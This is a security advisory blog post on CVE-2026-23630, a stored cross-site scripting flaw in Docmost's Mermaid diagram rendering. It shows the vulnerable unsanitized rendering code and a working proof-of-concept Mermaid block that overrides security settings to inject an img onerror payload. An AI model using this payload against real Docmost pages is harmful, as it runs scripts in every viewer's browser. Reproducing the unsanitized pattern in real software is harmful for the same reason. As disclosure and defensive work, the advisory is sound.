← Back to Blog
MediumCVSS 5.4XSSCVE-2026-23630

Published January 2026

Docmost Mermaid XSS via Unsanitized SVG Rendering

BugBunny.ai discovered a cross-site scripting vulnerability in Docmost where Mermaid diagram rendering allows HTML injection through directive overrides. Attackers can embed malicious scripts in Mermaid code blocks that execute for every user who views the page.

Responsibly DisclosedView CVE →

Summary

Impact:Stored XSS affecting all page viewers
Vector:Mermaid %%{init}%% directive bypass
Surface:Any Docmost page with Mermaid code blocks
Status:Fixed in latest Docmost version

Root Cause

Docmost renders Mermaid diagrams by calling mermaid.render() and directly injecting the returned SVG into the DOM using dangerouslySetInnerHTML. The Mermaid library supports configuration directives that can override security settings, including securityLevel: "loose" which enables HTML in labels.

Proof of Concept

// Vulnerable rendering logic in Docmost
// apps/client/src/features/editor/components/code-block/mermaid-view.tsx (~28-56)

mermaid
  .render(id, node.textContent)     // attacker-controlled diagram
  .then((item) => {
    setPreview(item.svg);           // raw HTML/SVG returned - NO SANITIZATION
  });

// Later in JSX:
<div
  className={classes.mermaid}
  contentEditable={false}
  dangerouslySetInnerHTML={{ __html: preview }}  // Direct injection!
></div>

// PoC: Insert this Mermaid code block into any Docmost page:
\`\`\`mermaid
%%{init: { "securityLevel": "loose", "htmlLabels": true }}%%
graph TD;
  X["<img src=x onerror=alert(document.domain)>"];
\`\`\`

// Result: XSS executes for EVERY user who views the page
// The %%{init}%% directive overrides Mermaid's security settings:
// - securityLevel: "loose" disables HTML escaping
// - htmlLabels: true allows HTML in node labels

Mitigation

  • Update to the latest version of Docmost
  • The fix sanitizes Mermaid output or blocks dangerous directives
  • Consider using a Content Security Policy to mitigate XSS impact

Credits & Disclosure

Identified by BugBunny.ai and responsibly disclosed to the Docmost maintainers.

Reporter: BugBunny.aiCVE-2026-23630
CVE-2026-23630: Docmost Mermaid XSS | BugBunny.ai | BugBunny.ai